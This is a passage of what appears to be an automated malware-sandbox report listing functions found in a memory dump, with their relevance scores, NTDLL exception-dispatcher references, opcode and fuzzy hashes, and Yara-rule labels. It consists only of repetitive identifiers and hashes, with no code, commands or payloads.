                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: 72486613b0289e21beff143375b34014c86a67ef06c54d329f79c5ef0ef99fe1
                                                                                                                • Instruction ID: 357065ccacc314ab0ed6529b5af350165e094024405e67901bd28e84c30ebd99
                                                                                                                • Opcode Fuzzy Hash: 72486613b0289e21beff143375b34014c86a67ef06c54d329f79c5ef0ef99fe1
                                                                                                                • Instruction Fuzzy Hash: D0521874A00224CFCB69EF64C85869DBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589EC5, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 602COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: af6d66f833a60186ab2930c922fd5275249b7c30c7232fdfc20b6ae1479bd80a
                                                                                                                • Instruction ID: e3af0ccd4be1f9f4f5fc57f64267c1f6cec7a036031ac63f0d0b152d8eec2acf
                                                                                                                • Opcode Fuzzy Hash: af6d66f833a60186ab2930c922fd5275249b7c30c7232fdfc20b6ae1479bd80a
                                                                                                                • Instruction Fuzzy Hash: 07521974A00224CFCB69EF64C85869DBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589F01, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 597COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: 2e2d66b15d8b48f4c603e685275124b14b9a764f0bc95d765bc0a6f615b4c66c
                                                                                                                • Instruction ID: 306d5975ec7e110692cc0c497f7f59c82fb8cc07d24c05cf6220524076e04361
                                                                                                                • Opcode Fuzzy Hash: 2e2d66b15d8b48f4c603e685275124b14b9a764f0bc95d765bc0a6f615b4c66c
                                                                                                                • Instruction Fuzzy Hash: 5A522874A00224CFCB69EF24C85869DBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589F46, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 590COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: 9f9b9b990043bbb227089d951ee6bec243ff67e32951c4f5f32f114a6f37e863
                                                                                                                • Instruction ID: da5626dbae2dd3ed21a94d9507bc6365e87372f9f65253f6af50a1de4aa87438
                                                                                                                • Opcode Fuzzy Hash: 9f9b9b990043bbb227089d951ee6bec243ff67e32951c4f5f32f114a6f37e863
                                                                                                                • Instruction Fuzzy Hash: 30522974A00224CFCB69EF64C85869DBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589F8B, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 583COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: 6bbdde6a1d3fdbf3c0efd9a874af906f450fc08c21a1bc05846d7a1e76f4025d
                                                                                                                • Instruction ID: 8b475620a1e7559e2ffde1a772316c149a6bcab759162a0fcf66081692635101
                                                                                                                • Opcode Fuzzy Hash: 6bbdde6a1d3fdbf3c0efd9a874af906f450fc08c21a1bc05846d7a1e76f4025d
                                                                                                                • Instruction Fuzzy Hash: A2421874A00224CFCB69EF64C85869DBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00589FD0, Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 576COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 0-1034420596
                                                                                                                • Opcode ID: a367398a3f6dc438ea1ad323cda00fd10018bd87442dea74105eff0973262924
                                                                                                                • Instruction ID: 75b10c323897649c688d13c3fdbdad74b98fded422bae033d321ce5508b53fa6
                                                                                                                • Opcode Fuzzy Hash: a367398a3f6dc438ea1ad323cda00fd10018bd87442dea74105eff0973262924
                                                                                                                • Instruction Fuzzy Hash: A2422974A00224CFCB69EF64C85869DBBB6BF88305F6088EAD509A7750CF349E85CF55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A42D, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 409COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 86c81876a93be62c270b2445249b6ffd3f1b66d5b5b873531696d18e8e595ce4
                                                                                                                • Instruction ID: f6ae5b8100eae036e31200fe6b9ef3a475d20b0402242639e62545d3199263ce
                                                                                                                • Opcode Fuzzy Hash: 86c81876a93be62c270b2445249b6ffd3f1b66d5b5b873531696d18e8e595ce4
                                                                                                                • Instruction Fuzzy Hash: 4712F774A01224CFCB69AF20C85469CB7B6BF88305F6088EAD909A7750CF349EC5DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A472, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 402COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 0b6f6b2f869e98ee6a9023a5e230165d0a00ad3ef70ac5811ae670ac457fae52
                                                                                                                • Instruction ID: 4ebe960a6162b54e14961743078d88c5a93d94d4fad82a797336ce314464505b
                                                                                                                • Opcode Fuzzy Hash: 0b6f6b2f869e98ee6a9023a5e230165d0a00ad3ef70ac5811ae670ac457fae52
                                                                                                                • Instruction Fuzzy Hash: 0F12F874A01224CFDB69AF20C85469CB7B6BF88305F6088EAD909A7750CF349EC5DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A4B7, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 395COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: a64499095ed9d5faf5bf867bfe8cc0291fce2b64e7bad6de908919f2b300c53e
                                                                                                                • Instruction ID: 4c4924211684e08830d4a8ad6935ade4d84c37a744845d340b6c14b0b61fc93a
                                                                                                                • Opcode Fuzzy Hash: a64499095ed9d5faf5bf867bfe8cc0291fce2b64e7bad6de908919f2b300c53e
                                                                                                                • Instruction Fuzzy Hash: 0D1208B4901224CFDB69AF20C85469CB7B6BF88305F6088EAD909A7750CF349EC5DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A4FC, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 388COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: f828273952ae98ce3d8d0f51b2dfe1fdfc56e370f9a57e8d45096c970c2b515c
                                                                                                                • Instruction ID: 8d91de37ae1c462c763db010f906ca3b65b5fa09e80815f990cf7e5900037766
                                                                                                                • Opcode Fuzzy Hash: f828273952ae98ce3d8d0f51b2dfe1fdfc56e370f9a57e8d45096c970c2b515c
                                                                                                                • Instruction Fuzzy Hash: C7020874901224CFDB69AF20C85469CB7B6BF88305F6088EAD909A7750CF349EC5DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A541, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 381COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 66ef256b20f8790b45712bfb99bfdda0a61e5ffbe378048b3c3aac646f363389
                                                                                                                • Instruction ID: c78b14ebc9a337e20086224015cdbbe18084838047c5a090560810f127f75f19
                                                                                                                • Opcode Fuzzy Hash: 66ef256b20f8790b45712bfb99bfdda0a61e5ffbe378048b3c3aac646f363389
                                                                                                                • Instruction Fuzzy Hash: 3D020974901224CFDB69AF20C85469CB7B6BF88305F6088EAD909A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A586, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 374COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 914ff9f21b291dfe1c9e78b4fdcb918ea3c115fb2a90b36aed1136340fd923e1
                                                                                                                • Instruction ID: fe54bf40fd066e8c769ab1f1b7fec9702af4b20d33be9c21af38855e18cdb127
                                                                                                                • Opcode Fuzzy Hash: 914ff9f21b291dfe1c9e78b4fdcb918ea3c115fb2a90b36aed1136340fd923e1
                                                                                                                • Instruction Fuzzy Hash: 880209B4901224CFDB69AF24C85469CB7B6BF88305F6088EAD909A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A5CB, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 367COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 07c1a259e1782a04b492cfc69aca55d17e519f5949dbc9826ff2189655626c6b
                                                                                                                • Instruction ID: a66ed6de53dd574075668630584887135e1afbb5afac3008d73f0712aa9cf37d
                                                                                                                • Opcode Fuzzy Hash: 07c1a259e1782a04b492cfc69aca55d17e519f5949dbc9826ff2189655626c6b
                                                                                                                • Instruction Fuzzy Hash: 460209B4901224CFDB69AF24C85469CB7B6BF88305F6088EAD909A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A610, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 358COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 92aa1b2b59956b1fbcad3f1a931b018689b18b4427c6dbce6771e2a53df33b2f
                                                                                                                • Instruction ID: c48394fbfb23789976710d5dad30c4b09bf4eca5e1da8617876d22f511803d2c
                                                                                                                • Opcode Fuzzy Hash: 92aa1b2b59956b1fbcad3f1a931b018689b18b4427c6dbce6771e2a53df33b2f
                                                                                                                • Instruction Fuzzy Hash: 12F119B4901224CFDB69AF24C85469CB7B6BF88305F6088EAD909A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A64C, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 353COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 588f47b20b09f157c0205143c0020c9593fd7f45ff71759abbb43df5a24bffe5
                                                                                                                • Instruction ID: 65fe0bedaa46a5bfff6af4c871574ee2064c8b41a60fd9944883c37a32466e1b
                                                                                                                • Opcode Fuzzy Hash: 588f47b20b09f157c0205143c0020c9593fd7f45ff71759abbb43df5a24bffe5
                                                                                                                • Instruction Fuzzy Hash: 64F10AB4900224CFDB68AF24C85469CB7B6BF88305F6089EAD909A7750CF349EC5DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A691, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 346COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 6f9954e2e65443c1f6a23cd4a207888cc609d1eabf725579d70e42d64b694d42
                                                                                                                • Instruction ID: 1d334b03524ef2e6e05219bdeabf720bcbe85772753f95d93db0dd72154de938
                                                                                                                • Opcode Fuzzy Hash: 6f9954e2e65443c1f6a23cd4a207888cc609d1eabf725579d70e42d64b694d42
                                                                                                                • Instruction Fuzzy Hash: 18F10AB4900225CFCB68AF24C85469CB7B6BF88305F6088EAD509A7750CF359EC5DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A6D9, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 339COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 0eec6f387d418ec28a3148be91fa8393c3aa3bf137f0bca615c2f5a61d12e6f4
                                                                                                                • Instruction ID: d9e3e7733d2ff2ab48cdc51065a0419ece4ea6a75ad8e783586bc50ba31348be
                                                                                                                • Opcode Fuzzy Hash: 0eec6f387d418ec28a3148be91fa8393c3aa3bf137f0bca615c2f5a61d12e6f4
                                                                                                                • Instruction Fuzzy Hash: DFF10AB4A00225CFCB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A721, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 332COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 29779d977dd3880a06c4fc563623add50f82479409e40939fe11eee685697a0e
                                                                                                                • Instruction ID: 41a50c30c727e130296aac738d8175070535d7021992b67e716efcadb2183443
                                                                                                                • Opcode Fuzzy Hash: 29779d977dd3880a06c4fc563623add50f82479409e40939fe11eee685697a0e
                                                                                                                • Instruction Fuzzy Hash: F9F1FBB4A00225CFCB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A769, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 325COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 9b1ec24fad98132e8f1d3a1dc5d15dfcfb07f2606c4d50892f742ee88a3750db
                                                                                                                • Instruction ID: 0dccc59eecca775482a6e0a6fde6fe22e834cc759f8ab2bc46860f8e27c8f327
                                                                                                                • Opcode Fuzzy Hash: 9b1ec24fad98132e8f1d3a1dc5d15dfcfb07f2606c4d50892f742ee88a3750db
                                                                                                                • Instruction Fuzzy Hash: A7E1FAB4A00225CFCB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A7B1, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 318COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 5dc2449bfafb8e72719a521dada8af7f507ceccbb51086393a764485aa6c457e
                                                                                                                • Instruction ID: 3a21f36325f241d85f042f064dc223af0e8e82e32d697243ef44bf8c7a0d0051
                                                                                                                • Opcode Fuzzy Hash: 5dc2449bfafb8e72719a521dada8af7f507ceccbb51086393a764485aa6c457e
                                                                                                                • Instruction Fuzzy Hash: 43E1FBB4A00225CFDB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A7F9, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 311COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 3126d8123bc96b5252b29d59bc217914487b39b97a3f87772e55125c8a2cbb5f
                                                                                                                • Instruction ID: e42b9243330f1b8e96fa04db5f38eafe805f3291efacb03aee0ab72933c79280
                                                                                                                • Opcode Fuzzy Hash: 3126d8123bc96b5252b29d59bc217914487b39b97a3f87772e55125c8a2cbb5f
                                                                                                                • Instruction Fuzzy Hash: D5E1FAB4A00225CFDB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A841, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 304COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: ae62e211af836794d99e9dfdb1c141ecb742330c9dd50c4cc002af9ec2c45e33
                                                                                                                • Instruction ID: 4e151957731fde524de1c039951d214209766da6c9bce50ef473948ca5983491
                                                                                                                • Opcode Fuzzy Hash: ae62e211af836794d99e9dfdb1c141ecb742330c9dd50c4cc002af9ec2c45e33
                                                                                                                • Instruction Fuzzy Hash: 41D10BB4A01225CFCB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A889, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 297COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: d181b9fc790a72a9fe283319594c10fcb829335a8baae13fbdfbb9c82889507c
                                                                                                                • Instruction ID: ddaf11a30f785f997890fa75664e2213258ff3b643b37697a286318e64e290d3
                                                                                                                • Opcode Fuzzy Hash: d181b9fc790a72a9fe283319594c10fcb829335a8baae13fbdfbb9c82889507c
                                                                                                                • Instruction Fuzzy Hash: 9DD1FBB4A00225CFDB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A8D1, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 290COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 7e607dbb2bb26d8de1031c423b1e43c7c1eaaa142bd379c163e318856d9cebd2
                                                                                                                • Instruction ID: 14ae08e1beadb99b96b42d1aa79f58713f8d278f6ac131003fac84a0ad633856
                                                                                                                • Opcode Fuzzy Hash: 7e607dbb2bb26d8de1031c423b1e43c7c1eaaa142bd379c163e318856d9cebd2
                                                                                                                • Instruction Fuzzy Hash: 00D10CB4A00225CFCB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A919, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 283COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058A940
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: fcfbe6bcffe71d2d2f627ce0b0e873afff654c10f1dab4814f3b727cc2a7bb14
                                                                                                                • Instruction ID: 2fa36093292b22b24217e3029e6f8726f31fea4ad63dfa564dd31f3ff07e1923
                                                                                                                • Opcode Fuzzy Hash: fcfbe6bcffe71d2d2f627ce0b0e873afff654c10f1dab4814f3b727cc2a7bb14
                                                                                                                • Instruction Fuzzy Hash: 57D10CB4A00225CFDB68AF24C85469DB7B6BF88305F6088EAD509A7750CF349EC5CF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0058A961, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 276COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 0058AD0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.704325441.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                • String ID: *g$*g
                                                                                                                • API String ID: 6842923-1034420596
                                                                                                                • Opcode ID: 44c5524fc3fde9fa5be3ab08a1c1d2dc9d5818d3281ac70386369a02f262e194
                                                                                                                • Instruction ID: 09bd0a5a6dcd1a62bb07ad1b587ecb3db632f85fc82130ddedc57d4528462866
                                                                                                                • Opcode Fuzzy Hash: 44c5524fc3fde9fa5be3ab08a1c1d2dc9d5818d3281ac70386369a02f262e194
